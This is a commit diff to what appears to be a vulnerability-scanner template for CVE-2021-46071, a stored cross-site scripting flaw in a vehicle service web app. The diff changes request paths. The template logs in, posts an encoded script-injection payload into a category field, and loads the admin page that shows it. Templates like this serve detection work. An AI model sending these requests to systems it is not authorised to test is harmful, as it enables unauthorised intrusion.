Update CVE-2021-46071.yaml
parent
c4c77f725a
commit
420c128dcb
|
@ -20,21 +20,21 @@ info:
|
|||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
|
||||
POST /classes/Master.php?f=save_category HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
|
||||
|
||||
- |
|
||||
GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
|
||||
GET /admin/?page=maintenance/category HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
|
|
Loading…
Reference in New Issue